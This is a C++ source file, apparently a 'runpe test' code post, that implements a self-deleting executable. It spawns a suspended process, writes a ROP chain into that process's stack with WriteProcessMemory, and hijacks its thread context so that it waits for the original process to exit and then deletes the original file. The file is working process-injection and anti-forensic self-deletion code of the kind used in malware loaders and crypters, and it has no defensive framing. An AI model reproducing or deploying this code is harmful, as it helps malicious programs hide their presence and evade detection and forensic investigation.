Code:
// runpe test.cpp : Defines the entry point for the console application.//


#include <windows.h>
#include <cstdio>
#include <ntdll.h>
#include <stddef.h>
#pragma comment(lib, "ntdll.lib")


#define INVALID_HANDLE(h) (INVALID_HANDLE_VALUE == (h) || NULL == (h))


HANDLE get_current_file_handle()
{
	WCHAR fileNameString[MAX_PATH] = {0};
	UNICODE_STRING fileName = {0};
	OBJECT_ATTRIBUTES obj = {0};
	HANDLE fileHandle = INVALID_HANDLE_VALUE;
	IO_STATUS_BLOCK io = {0};
	NTSTATUS status;


	GetModuleFileName(NULL, fileNameString, _countof(fileNameString));
	if(!RtlDosPathNameToNtPathName_U(fileNameString, &fileName, NULL, NULL))
		return INVALID_HANDLE_VALUE;
	InitializeObjectAttributes(&obj, &fileName, OBJ_CASE_INSENSITIVE, 0, NULL);


	status = NtOpenFile(&fileHandle, DELETE, &obj, &io, 
		FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
		FILE_SUPERSEDE);
	if(NT_ERROR(status))
	{
		printf("status = %X\n", status);
		return INVALID_HANDLE_VALUE;
	}	
	
	return fileHandle;
}


/*
	\brief Writes the ROP chain at address.
		The chain MUST start execution at NtWaitForSingleObject.
		It will :
		- Wait until this process has terminated.
		- Then close the handle to this process.
		- Mark the file of this process for deletion
		- Close the handle to this file - which will trigger the
		deletion.
		- Exit.
	\param process Process to write to
	\param address Address to write to.
	\fixme Maybe don't delete but overwrite with trash?
*/
bool write_ROP_chain(HANDLE process, DWORD address)
{
	HANDLE duplicatedProcessHandle = INVALID_HANDLE_VALUE,
		fileHandle = INVALID_HANDLE_VALUE;
	DWORD written = 0;
	bool success = false;
	NTSTATUS status = ERROR_SUCCESS;
	DWORD ropChain[] = {
		// EIP = NtWaitForSingleObject
		(DWORD)&NtClose,						// Return address 
		0,										// Own process handle
		FALSE,									// Alertable
		NULL,									// Timeout
		// EIP = NtClose
		(DWORD)&NtSetInformationFile,			// Return address
		0,										// Own process handle
		// EIP = NtSetInformationFile
		(DWORD)&NtClose,						// Return addr
		0,										// File handle
		0,										// Pointer to IoStatusBlock
		0,										// Pointer to FileInformation
		sizeof(FILE_DISPOSITION_INFORMATION),	// Length
		FileDispositionInformation,				// FILE_INFORMATION_CLASS
		// EIP = NtClose
		(DWORD)&RtlExitUserThread,				// Ret. addr
		0,										// File handle
		// EIP = RtlExitUserThread
		STATUS_CANNOT_DELETE,					// Shutdown reason


		// FILE_DISPOSITION_INFORMATION structure
		TRUE,
	};


	if(INVALID_HANDLE(process) || !address)
		return false;
	
	// Duplicate current process handle so the other process can wait on it
	if(NT_ERROR(status = NtDuplicateObject(GetCurrentProcess(), GetCurrentProcess(), process, 
		&duplicatedProcessHandle, 0, 0, DUPLICATE_SAME_ACCESS)))
	{
		printf("Can't duplicate process handle: %X\n", status);
		goto EXIT;
	}
	ropChain[1] = (DWORD)duplicatedProcessHandle; // NtWaitForSingleObject
	ropChain[5] = (DWORD)duplicatedProcessHandle; // NtClose


	if(INVALID_HANDLE_VALUE == (fileHandle = get_current_file_handle()))
	{
		printf("Can't get file handle: %X\n", GetLastError());
		goto EXIT;
	}


	// This duplicates and closes the local handle of this file
	if(NT_ERROR(status = NtDuplicateObject(GetCurrentProcess(), fileHandle, process, &fileHandle, 
		0, 0, DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS)))
	{
		printf("Can't duplicate file handle: %X\n", status);
		goto EXIT;
	}
	ropChain[7] = (DWORD)fileHandle; // NtSetInformationFile
	ropChain[13] = (DWORD)fileHandle; // NtClose


	/* Setup IO_STATUS_BLOCK for NtSetInformationFile. As at this point a 
		large enough portion of the ROP chain has been executed and IO_STATUS_BLOCK
		needs no special values so just use the top of chain */
	ropChain[8] = (DWORD)address;


	/* FileDispositionInformation needs a TRUE so we just add one at the
		end of the ROP chain and make a pointer to it. */
	ropChain[9] = (DWORD)address + (sizeof(ropChain) - sizeof(FILE_DISPOSITION_INFORMATION));


	if(!WriteProcessMemory(process, (LPVOID)address, ropChain, sizeof(ropChain), &written) ||
		sizeof(ropChain) != written)
	{
		printf("Couldn't write: %X\n", GetLastError());
		goto EXIT;
	}


	success = true;
EXIT:
	return success;
}




void entry()
{
	CONTEXT ctx = {0};
	_PROCESS_INFORMATION pi = {0};
	STARTUPINFOA si = {0};
	const char* FILE_TO_EXECUTE = "main.exe";
	bool success = false;


	si.cb = sizeof(STARTUPINFOA);
	if(!CreateProcessA(FILE_TO_EXECUTE, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi))
		goto EXIT;


	ctx.ContextFlags = CONTEXT_ALL;
	if(!GetThreadContext(pi.hThread, &ctx))
	{
		printf("Can't get thread context\n");
		goto FINISH_OTHER_PROCESS;
	}


	printf("EAX: %X\tESP: %X\tEIP: %X\n", ctx.Eax, ctx.Esp, ctx.Eip);
	
	/* ROP chain needs a certain size so just round ESP down to
		page boundary - which is enough */
	ctx.Esp &= ~0xFFF;
	if(!write_ROP_chain(pi.hProcess, ctx.Esp))
	{
		printf("Can't overwrite stack\n");
		goto FINISH_OTHER_PROCESS;
	}


	ctx.Eip = (DWORD)&NtWaitForSingleObject;
	if(!SetThreadContext(pi.hThread, &ctx))
	{
		printf("Can't set thread context\n");
		goto FINISH_OTHER_PROCESS;
	}


	success = true;


FINISH_OTHER_PROCESS:
	if(success)
	{
		ResumeThread(pi.hThread);


		/* For debugging this can be uncommented so you have time to
			attach to the other process. 
		WaitForSingleObject(pi.hProcess, INFINITE); */
	}
	else
	{
		TerminateProcess(pi.hProcess, 0);
	}


CLEANUP:
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
EXIT:
	ExitProcess(0);
}